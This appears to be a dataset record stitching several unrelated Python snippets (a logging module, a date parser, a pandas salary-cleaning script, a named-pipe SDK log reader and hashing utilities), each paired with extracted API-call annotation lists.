1)\n', (2748, 2755), False, 'from fractions import Fraction\n'), ((3763, 3778), 'fractions.Fraction', 'Fraction', (['(25)', '(1)'], {}), '(25, 1)\n', (3771, 3778), False, 'from fractions import Fraction\n'), ((13637, 13677), 'fractions.Fraction', 'fractions.Fraction', (['sample_rate', 'samples'], {}), '(sample_rate, samples)\n', (13655, 13677), False, 'import fractions\n'), ((3361, 3381), 'mediatimestamp.immutable.Timestamp.get_time', 'Timestamp.get_time', ([], {}), '()\n', (3379, 3381), False, 'from mediatimestamp.immutable import TimeOffset, Timestamp\n'), ((4470, 4490), 'mediatimestamp.immutable.Timestamp.get_time', 'Timestamp.get_time', ([], {}), '()\n', (4488, 4490), False, 'from mediatimestamp.immutable import TimeOffset, Timestamp\n'), ((9277, 9297), 'mediatimestamp.immutable.Timestamp.get_time', 'Timestamp.get_time', ([], {}), '()\n', (9295, 9297), False, 'from mediatimestamp.immutable import TimeOffset, Timestamp\n'), ((10113, 10133), 'mediatimestamp.immutable.Timestamp.get_time', 'Timestamp.get_time', ([], {}), '()\n', (10131, 10133), False, 'from mediatimestamp.immutable import TimeOffset, Timestamp\n'), ((15034, 15046), 'copy.deepcopy', 'deepcopy', (['ag'], {}), '(ag)\n', (15042, 15046), False, 'from copy import deepcopy\n'), ((9532, 9543), 'mediatimestamp.immutable.Timestamp', 'Timestamp', ([], {}), '()\n', (9541, 9543), False, 'from mediatimestamp.immutable import TimeOffset, Timestamp\n'), ((10342, 10353), 'mediatimestamp.immutable.Timestamp', 'Timestamp', ([], {}), '()\n', (10351, 10353), False, 'from mediatimestamp.immutable import TimeOffset, Timestamp\n'), ((14574, 14624), 'struct.pack', 'struct.pack', (["('@' + 'h' * samples * channels)", '*line'], {}), "('@' + 'h' * samples * channels, *line)\n", (14585, 14624), False, 'import struct\n'), ((15456, 15500), 'mediatimestamp.immutable.TimeOffset.from_count', 'TimeOffset.from_count', (['count', 'sample_rate', '(1)'], {}), '(count, sample_rate, 1)\n', (15477, 15500), False, 'from mediatimestamp.immutable import TimeOffset, Timestamp\n'), ((14762, 14812), 'struct.pack', 'struct.pack', (["('@' + 'i' * samples * channels)", '*line'], {}), "('@' + 'i' * samples * channels, *line)\n", (14773, 14812), False, 'import struct\n'), ((14857, 14907), 'struct.pack', 'struct.pack', (["('@' + 'f' * samples * channels)", '*line'], {}), "('@' + 'f' * samples * channels, *line)\n", (14868, 14907), False, 'import struct\n'), ((14677, 14697), 'struct.pack', 'struct.pack', (['"""@i"""', 'x'], {}), "('@i', x)\n", (14688, 14697), False, 'import struct\n'), ((14952, 15002), 'struct.pack', 'struct.pack', (["('@' + 'd' * samples * channels)", '*line'], {}), "('@' + 'd' * samples * channels, *line)\n", (14963, 15002), False, 'import struct\n')] |
"""
_logging module (imdb package).
"""
import logging
LEVELS = {'debug': logging.DEBUG,
'info': logging.INFO,
'warn': logging.WARNING,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL}
imdbpyLogger = logging.getLogger('media_browser')
imdbpyStreamHandler = logging.StreamHandler()
imdbpyFormatter = logging.Formatter('%(asctime)s %(levelname)s [%(name)s]' \
' %(pathname)s:%(lineno)d: %(message)s')
imdbpyStreamHandler.setFormatter(imdbpyFormatter)
imdbpyLogger.addHandler(imdbpyStreamHandler)
def setLevel(level):
"""Set logging level for the main logger."""
level = level.lower().strip()
imdbpyLogger.setLevel(LEVELS.get(level, logging.NOTSET))
imdbpyLogger.log(imdbpyLogger.level, 'set logging threshold to "%s"',
logging.getLevelName(imdbpyLogger.level))
#imdbpyLogger.setLevel(logging.DEBUG)
# It can be an idea to have a single function to log and warn:
#import warnings
#def log_and_warn(msg, args=None, logger=None, level=None):
# """Log the message and issue a warning."""
# if logger is None:
# logger = imdbpyLogger
# if level is None:
# level = logging.WARNING
# if args is None:
# args = ()
# #warnings.warn(msg % args, stacklevel=0)
# logger.log(level, msg % args)
| [
"logging.getLogger",
"logging.Formatter",
"logging.getLevelName",
"logging.StreamHandler"
] | [((277, 311), 'logging.getLogger', 'logging.getLogger', (['"""media_browser"""'], {}), "('media_browser')\n", (294, 311), False, 'import logging\n'), ((334, 357), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (355, 357), False, 'import logging\n'), ((376, 480), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s %(levelname)s [%(name)s] %(pathname)s:%(lineno)d: %(message)s"""'], {}), "(\n '%(asctime)s %(levelname)s [%(name)s] %(pathname)s:%(lineno)d: %(message)s'\n )\n", (393, 480), False, 'import logging\n'), ((867, 907), 'logging.getLevelName', 'logging.getLevelName', (['imdbpyLogger.level'], {}), '(imdbpyLogger.level)\n', (887, 907), False, 'import logging\n')] |
import datetime
from collections import OrderedDict
def decode_date(string):
"""Decodes a date from a command line argument, returning datetime object".
Args:
string: See AssetSetCommand class comment for the allowable
date formats.v
Returns:
long, datetime object
Raises:
ValueError: if string does not conform to a legal date format.
"""
date_formats = ['%Y%m%d',
'%Y-%m-%d',
'%Y-%m-%dT%H:%M:%S',
'%Y-%m-%dT%H:%M:%S.%f']
for date_format in date_formats:
try:
dt = datetime.datetime.strptime(string, date_format)
return dt
except ValueError:
continue
raise ValueError('Invalid format for date: "%s".' % string)
| [
"datetime.datetime.strptime"
] | [((604, 651), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['string', 'date_format'], {}), '(string, date_format)\n', (630, 651), False, 'import datetime\n')] |
# %%
# from numpy.core.fromnumeric import size
import pandas as pd
df = pd.read_csv("glassdoor_jobs.csv")
df = df[df["Salary Estimate"] != "-1"]
df
# TO DO IN DATA CLEANING
# -------------------
# salary parsing
# %%
salary = df["Salary Estimate"].apply(lambda x: x.split("(")[0])
# salary
minus_Kd = salary.apply(
lambda x: x.replace("K", "").replace("₹", "").replace(",", ""))
minus_Kd[0]
df["min_salary"] = minus_Kd.apply(lambda x: int(x.split("-")[0]))
# df
# #%%
# type(df["min_salary"])
# df["min_salary"].dtype
df["max_salary"] = minus_Kd.apply(lambda x: int((x.split("-")[1])))
# df
df["average-salary"] = (df.min_salary + df.max_salary) / 2
# df
df["currency"] = "LAKh"
# df
df
# company name text only
# %%
df["company_txt"] = df["Company Name"].apply(lambda x: x.split("\n")[0])
df
# state field
# %%
df.Location.value_counts()
# %%
# 2 ways to delete undesired column from the data frame
# 1.
# del df["Headquarters"]
# df = df.drop("Headquarters", 1)
df = df.drop("Competitors", 1)
df
# age of company
# %%
df["age"] = df.Founded.apply(lambda x: x if x < 1 else 2020 - x)
df
# parsing of job description (PYTHON)
# %%
# will check all job descriptions keyword - analysis
# python
df["analysis"] = df["Job Description"].apply(lambda x: 1
if "analysis" in x.lower() else 0)
df.analysis.value_counts()
# %%
df["Job Description"][0]
# df["hourly"] = df["Salary Estimate"].apply(lambda x: 1
# if "per hour" in x.lower() else 0)
# df
# %%
df
# df["employer_provided"] = df["Salary Estimate"].apply(lambda x: 1
# if "employer provided" in x.lower() else 0)
# df
# min_hr = minus_Kd.apply(lambda x: x.lower().replace("per hour". '').replace('employer provided salary:', ''))
# %%
# *df cleaned*
df_out = df
df_out
# %%
df_out.to_csv("GL_sal_data_cleaned.csv", index=False)
# %%
pd.read_csv("GL_sal_data_cleaned.csv")
# %%
| [
"pandas.read_csv"
] | [((73, 106), 'pandas.read_csv', 'pd.read_csv', (['"""glassdoor_jobs.csv"""'], {}), "('glassdoor_jobs.csv')\n", (84, 106), True, 'import pandas as pd\n'), ((1931, 1969), 'pandas.read_csv', 'pd.read_csv', (['"""GL_sal_data_cleaned.csv"""'], {}), "('GL_sal_data_cleaned.csv')\n", (1942, 1969), True, 'import pandas as pd\n')] |
# -*- coding: utf-8 -*-
"""
# Class to handle reading of SDK Log Data as a pipe/fifo for
# Windows and Unix, to avoid big log files.
----------------------------------------------------------
"""
import platform
import os
import tempfile
IS_WINDOWS = platform.system().lower() == "windows"
if IS_WINDOWS:
try:
import win32pipe, win32file
except:
print("*** WARNING: PyWin dependencies not found for Windows - Please install via:\n\n pip3 install --user pywin32 \n")
class SDKLogPipeHandler(object):
def __init__(self, is_windows=True):
super(SDKLogPipeHandler, self).__init__()
# Do we need Unix/Windows setup?
self.isWindows = is_windows
# A default location to create a named pipe
# This shall be used instead of writing the SDK Log to a file.
if self.isWindows:
self.pipe_name = r'\\.\pipe\UHSDK'
else:
tmpdir = tempfile.mkdtemp()
self.pipe_name = os.path.join(tmpdir, 'myfifo')
self.namedPipe = None
self.xyzi_regex = r'\[(-?[0-9.]+),(-?[0-9.]+),(-?[0-9.]+)\] intensity (-?[0-9.]+)'
# Number of bytes to read from SDK Log on Windows
self.num_bytes = 64*1024
def setupNamedPipe(self):
# On Windows, we use the win32pipe module
if self.isWindows:
if not self.namedPipe:
self.namedPipe = win32pipe.CreateNamedPipe(self.pipe_name, win32pipe.PIPE_ACCESS_DUPLEX,
win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_READMODE_MESSAGE | win32pipe.PIPE_WAIT,
win32pipe.PIPE_UNLIMITED_INSTANCES,
self.num_bytes,
self.num_bytes,
0,
None)
# Else, on Unix systems, use mkfifo
else:
if not self.namedPipe:
try:
self.namedPipe = os.mkfifo(self.pipe_name)
except:
print("EXCEPTION: Pipe for %s exists!" % self.pipe_name)
# win32pipe, Windows only methods
def connectToSDKPipe(self):
win32pipe.ConnectNamedPipe(self.namedPipe, None)
def getDataFromNamedPipe(self):
data = win32file.ReadFile(self.namedPipe, self.num_bytes)
return data
| [
"win32file.ReadFile",
"win32pipe.ConnectNamedPipe",
"os.path.join",
"win32pipe.CreateNamedPipe",
"platform.system",
"tempfile.mkdtemp",
"os.mkfifo"
] | [((2123, 2171), 'win32pipe.ConnectNamedPipe', 'win32pipe.ConnectNamedPipe', (['self.namedPipe', 'None'], {}), '(self.namedPipe, None)\n', (2149, 2171), False, 'import win32pipe, win32file\n'), ((2224, 2274), 'win32file.ReadFile', 'win32file.ReadFile', (['self.namedPipe', 'self.num_bytes'], {}), '(self.namedPipe, self.num_bytes)\n', (2242, 2274), False, 'import win32pipe, win32file\n'), ((253, 270), 'platform.system', 'platform.system', ([], {}), '()\n', (268, 270), False, 'import platform\n'), ((936, 954), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (952, 954), False, 'import tempfile\n'), ((984, 1014), 'os.path.join', 'os.path.join', (['tmpdir', '"""myfifo"""'], {}), "(tmpdir, 'myfifo')\n", (996, 1014), False, 'import os\n'), ((1405, 1651), 'win32pipe.CreateNamedPipe', 'win32pipe.CreateNamedPipe', (['self.pipe_name', 'win32pipe.PIPE_ACCESS_DUPLEX', '(win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_READMODE_MESSAGE | win32pipe.\n PIPE_WAIT)', 'win32pipe.PIPE_UNLIMITED_INSTANCES', 'self.num_bytes', 'self.num_bytes', '(0)', 'None'], {}), '(self.pipe_name, win32pipe.PIPE_ACCESS_DUPLEX, \n win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_READMODE_MESSAGE |\n win32pipe.PIPE_WAIT, win32pipe.PIPE_UNLIMITED_INSTANCES, self.num_bytes,\n self.num_bytes, 0, None)\n', (1430, 1651), False, 'import win32pipe, win32file\n'), ((1912, 1937), 'os.mkfifo', 'os.mkfifo', (['self.pipe_name'], {}), '(self.pipe_name)\n', (1921, 1937), False, 'import os\n')] |
import time
import uuid
import base64
import hashlib
def millis():
return int(round(time.time() * 1000))
def timestamp():
return int(time.time())
def base64_encode(s):
return base64.b64encode(s.encode('utf-8')).decode('utf-8')
def base64_decode(b):
return base64.b64decode(b).decode('utf-8')
def generate_uuid():
return str(uuid.uuid4())
def generate_sha1(text):
sha1_hash = hashlib.sha1()
sha1_hash.update(text.encode('utf-8'))
return sha1_hash.hexdigest()
| [
"hashlib.sha1",
"time.time",
"base64.b64decode",
"uuid.uuid4"
] | [((413, 427), 'hashlib.sha1', 'hashlib.sha1', ([], {}), '()\n', (425, 427), False, 'import hashlib\n'), ((147, 158), 'time.time', 'time.time', ([], {}), '()\n', (156, 158), False, 'import time\n'), ((356, 368), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (366, 368), False, 'import uuid\n'), ((282, 301), 'base64.b64decode', 'base64.b64decode', (['b'], {}), '(b)\n', (298, 301), False, 'import base64\n'), ((92, 103), 'time.time', 'time.time', ([], {}), '()\n', (101, 103), False, 'import time\n')] |